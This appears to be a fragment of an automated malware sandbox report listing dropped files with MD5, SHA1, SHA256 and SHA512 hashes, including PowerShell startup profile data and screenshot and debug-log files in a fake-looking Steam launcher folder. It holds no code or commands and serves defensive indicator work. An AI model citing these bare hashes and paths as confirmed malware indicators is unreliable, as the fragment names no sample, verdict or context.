| MD5 | 621419f834750f90083d9b5f3583d7bb |
| SHA1 | 32ac4e8c4e775b1cd9c28d4ffead71f347e0dcfb |
| SHA256 | 86971f5c7efb01cb04ae067eb8068a6a2d52f9fd3ed3861464953f47e698254e |
| SHA512 | ca9d2042b0bc78ff877f994a1f817c92284ac63951bd15b6164ef6636b6fc42d8d33d51fe5fd8ac7eff5b2f4e39b91a44939f7ea6a44c6ceb79e5adf65a65115 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8baa55f4c9614712ef2edb673b84f197 |
| SHA1 | f95f528a8dbff1c7c8abbc320633ad0ec097c902 |
| SHA256 | e2f3a14489a2526cb4341b9e7220531e1f46c861ea11d0a1ed17c901f6a1bee3 |
| SHA512 | 899e33b413570a0a5008367e4286b675325635da89f5271c8b466ffd748c23066e96ec379532b2045c258114a9f3cbb202f32320b3769e414bb768119ec39cc3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5caad758326454b5788ec35315c4c304 |
| SHA1 | 3aef8dba8042662a7fcf97e51047dc636b4d4724 |
| SHA256 | 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391 |
| SHA512 | 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693 |
C:\ProgramData\Steam\Launcher\EN-Ngomewng\Screenshots\Screenshot.png
| MD5 | a49da0880767ed802a3566423a8489f1 |
| SHA1 | 2775ee90615720b2aa8fd36ab51e5bd279a7b414 |
| SHA256 | 2eea278706f89c56083822507ede14c541670ee517870e64f6b05f2cded7fdc5 |
| SHA512 | 4bd4acace6572214b11f0025c6bb62c0907a8cfab206a61f97850051f1cc4ee77da60b4cce15667b21c962081483edc12032c044cf642e9a8d2ed876045526c6 |
C:\ProgramData\Steam\Launcher\EN-NGO~1\debug.log
| MD5 | 3038dece9944e3cd4243bb2cd7bbf04c |
| SHA1 | 87e48836d8776f1df3e229c220215aefaf47ac57 |
| SHA256 | 228972970c9fe1bb7443a39b7daed7d70601ba61d9717fa66179ba67d1a6f892 |
| SHA512 | ff3dd72eba660023a4728a409e09bedf79f0800a40ca474bcec48149596dd64577e9ceddd1242ed2422b058cd5af812136b6556d51f5e2d3b389d1c32508f1a4 |